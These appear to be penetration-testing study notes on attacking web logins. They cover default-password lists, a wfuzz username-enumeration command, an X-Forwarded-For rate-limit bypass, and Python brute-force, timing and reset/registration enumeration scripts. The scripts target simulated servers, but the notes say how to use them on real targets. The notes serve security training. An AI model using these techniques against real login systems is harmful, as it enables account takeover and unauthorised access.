7.1 Username
Default Password
https://www.cirt.net/passwords
https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv
https://github.com/scadastrangelove/SCADAPASS/blob/master/scadapass.csv
https://academy.hackthebox.com/storage/modules/80/scripts/basic_bruteforce_py.txt
https://academy.hackthebox.com/storage/modules/80/scripts/rate_limit_check_py.txt
Brute Force script
basic_bruteforce_py
CAPTCHA Bypass
Read the page source: the CAPTCHA solution, or a way to skip the check, may be exposed client-side.
Rate-Limit bypass
rate_limit_check.py
Add the header X-Forwarded-For: 127.0.0.1 to every request; if the rate limiter keys on that header instead of the real source address, the limit no longer applies.
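The brute-force loop and the X-Forwarded-For trick, as an added Python example (not the HTB basic_bruteforce_py or rate_limit_check.py scripts). The target is a constructed in-process fake login endpoint with a hypothetical 5-attempts-per-IP limit that keys on X-Forwarded-For when present; the socket address, the account, the limit and the wordlist are all assumptions, stand-ins for a real HTTP target and SecLists.

```python
"""Added example: a fake login endpoint that rate-limits per client IP but
trusts X-Forwarded-For, and a brute-forcer that rotates that header on 429."""
import hashlib
import itertools


class FakeLoginServer:
    """Constructed target, stands in for a real HTTP login form."""
    MAX_ATTEMPTS = 5   # assumption: lock an IP after 5 failed tries

    def __init__(self, username, password):
        self._user = username
        self._pw_hash = hashlib.sha256(password.encode()).hexdigest()
        self._failures = {}   # client ip -> failed attempt count

    def _client_ip(self, socket_ip, headers):
        # The flaw: the rate-limit key comes from a client-supplied header,
        # so the attacker chooses the key.
        return headers.get("X-Forwarded-For", socket_ip).split(",")[0].strip()

    def post_login(self, socket_ip, headers, username, password):
        ip = self._client_ip(socket_ip, headers)
        if self._failures.get(ip, 0) >= self.MAX_ATTEMPTS:
            return 429, "Too many requests"
        if (username == self._user
                and hashlib.sha256(password.encode()).hexdigest() == self._pw_hash):
            return 200, "Welcome"
        self._failures[ip] = self._failures.get(ip, 0) + 1
        return 401, "Invalid credentials"


def forwarded_for_values():
    """Spoofed source addresses: the localhost trick from the notes first,
    then a stream of private addresses so the limiter never sees a key twice."""
    yield "127.0.0.1"
    for a, b in itertools.product(range(1, 255), range(1, 255)):
        yield f"10.0.{a}.{b}"


def brute_force(server, username, wordlist, bypass=True):
    """Try every password; on HTTP 429 switch X-Forwarded-For (if bypass)
    and retry the same candidate. Returns the valid password or None."""
    ips = forwarded_for_values()
    headers = {}
    for candidate in wordlist:
        while True:
            status, _ = server.post_login("203.0.113.7", headers, username, candidate)
            if status == 200:
                return candidate
            if status == 429:
                if not bypass:
                    return None   # locked out, give up
                headers = {"X-Forwarded-For": next(ips)}
                continue          # same password, new "source" address
            break                 # 401: next candidate
    return None


# Constructed wordlist; in practice feed SecLists' default-passwords.csv.
WORDLIST = ["123456", "password", "admin", "letmein", "qwerty", "welcome", "password123"]

if __name__ == "__main__":
    target = FakeLoginServer("admin", "password123")
    print("without bypass:", brute_force(target, "admin", WORDLIST, bypass=False))
    target = FakeLoginServer("admin", "password123")
    print("with bypass:", brute_force(target, "admin", WORDLIST))
```

Without the bypass the sixth candidate already hits 429 and the search stops; with it, each 429 just costs one extra request. Against a real target, set the same header through your HTTP client and watch for the 429 (or the lockout page) to know when to rotate.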
Username
https://github.com/danielmiessler/SecLists/tree/master/Usernames
wfuzz -c -z file,/opt/useful/SecLists/Usernames/top-usernames-shortlist.txt -d "Username=FUZZ&Password=dummypass" --hs "Unknown username" http://test.test.test/user_unknown.php
Timing attack
https://academy.hackthebox.com/storage/modules/80/scripts/timing_py.txt
timing.py
Depending on the application's code, a valid username can take longer to reject than an invalid one (e.g. the password hash is only computed for existing users). Use timing.py to verify.
python3 timing.py /opt/useful/SecLists/Usernames/top-usernames-shortlist.txt
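An added Python example of the timing-based check (not the HTB timing.py script). The target is a constructed in-process login that runs PBKDF2 only for usernames that exist and rejects unknown ones before hashing; the user table, the iteration count, the candidate list and the outlier factor are assumptions.

```python
"""Added example: login that hashes only for known users, plus a timing probe
that flags usernames whose failed-login time is an outlier."""
import hashlib
import os
import statistics
import time

KDF_ITERATIONS = 50_000   # assumption: typical cost of a slow password hash


class FakeLoginServer:
    """Constructed target. Flaw: unknown users are rejected before the KDF
    runs, so a wrong password costs tens of ms for a real account, ~1 us for a fake one."""
    def __init__(self, users):
        self._db = {}
        for name, pw in users.items():
            salt = os.urandom(16)
            self._db[name] = (salt, hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, KDF_ITERATIONS))

    def login(self, username, password):
        rec = self._db.get(username)
        if rec is None:
            return False          # early return: no hashing for unknown users
        salt, digest = rec
        return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, KDF_ITERATIONS) == digest


def time_login(server, username, samples=5):
    """Median wall-clock time of `samples` failed logins for one username."""
    timings = []
    for _ in range(samples):
        t0 = time.perf_counter()
        server.login(username, "definitely-not-the-password")
        timings.append(time.perf_counter() - t0)
    return statistics.median(timings)


def enumerate_by_timing(server, candidates, factor=20.0):
    """Return candidates whose median response time exceeds factor x the
    baseline, where the baseline is a random name that cannot exist."""
    baseline = time_login(server, "nosuchuser-" + os.urandom(4).hex())
    return sorted(u for u in candidates if time_login(server, u) > baseline * factor)


CANDIDATES = ["root", "admin", "test", "guest", "info", "user"]   # constructed shortlist

if __name__ == "__main__":
    target = FakeLoginServer({"admin": "S3cret!", "user": "hunter2"})
    print(enumerate_by_timing(target, CANDIDATES))
```

The baseline comes from a random, guaranteed-unknown name rather than the fastest candidate, so the check still works when every candidate on the list happens to be valid. Over a network the gap is blurred by jitter: raise `samples` and lower `factor`, and compare medians, not single measurements.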
Python script to time scrypt and bcrypt (slow KDFs; PBKDF2 behaves alike) against plain SHA-1; this cost gap is what makes the timing attack above measurable. Requires the scrypt and bcrypt packages (pip install scrypt bcrypt).
import scrypt
import bcrypt
import datetime
import hashlib

rounds = 100
salt = bcrypt.gensalt()   # bcrypt-format salt, reused as raw salt bytes for scrypt

# scrypt
t0 = datetime.datetime.now()
for x in range(rounds):
    scrypt.hash(str(x).encode(), salt)
t1 = datetime.datetime.now()

# sha1 (fast, unsalted: the baseline)
for x in range(rounds):
    hashlib.sha1(str(x).encode())
t2 = datetime.datetime.now()

# bcrypt
for x in range(rounds):
    bcrypt.hashpw(str(x).encode(), salt)
t3 = datetime.datetime.now()

print("sha1: {}\nscrypt: {}\nbcrypt: {}".format(t2 - t1, t1 - t0, t3 - t2))
Password Attack
Enumerate through Password Reset
Sometimes the application's message reveals whether the username is valid or not.
Enumerate through Registration Form
The registration form reveals whether the username already exists.
Caveat: loud; every probe creates an account (and reset probes send e-mails and leave log entries).
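The reset and registration enumeration above, as an added Python example (not from the page or the HTB module). Instead of hard-coding the leaking string like the wfuzz `--hs` filter, it fingerprints each response by status and body length and compares it with a baseline response for a random name that cannot exist; the two constructed endpoints, the user table and the candidate list are assumptions.

```python
"""Added example: username enumeration through registration and password-reset
endpoints by diffing responses against a known-unknown baseline."""
import os

EXISTING_USERS = {"admin", "john", "support"}   # constructed user table
CREATED = []                                     # side effect: accounts the probe creates


def register(username):
    """Constructed endpoint that leaks through the message text."""
    if username in EXISTING_USERS:
        return 200, "Username already exists"
    CREATED.append(username)                     # the "loud" part: every probe makes an account
    return 200, "Account created, check your email"


def password_reset(username):
    """Constructed endpoint with the same message either way; a valid user
    gets a redirect instead, so the status code leaks."""
    if username in EXISTING_USERS:
        return 302, "If the account exists an email has been sent"
    return 200, "If the account exists an email has been sent"


def fingerprint(response):
    """Status + body length: catches wording, length and redirect differences."""
    status, body = response
    return (status, len(body))


def enumerate_users(endpoint, candidates):
    """Return candidates whose fingerprint differs from the known-unknown baseline."""
    baseline = fingerprint(endpoint("u" + os.urandom(6).hex()))
    return [name for name in candidates if fingerprint(endpoint(name)) != baseline]


CANDIDATES = ["root", "admin", "test", "john", "guest", "support"]   # constructed shortlist

if __name__ == "__main__":
    print("via registration:", enumerate_users(register, CANDIDATES))
    print("accounts created:", CREATED)
    print("via reset:", enumerate_users(password_reset, CANDIDATES))
```

Against a real target the fingerprint can include any stable differentiator (status, Content-Length, a redirect Location, a specific error element); the point of the baseline request is that you do not need to know the leaking message in advance. The `CREATED` list shows why the registration route is loud: every name that does not exist becomes a new account.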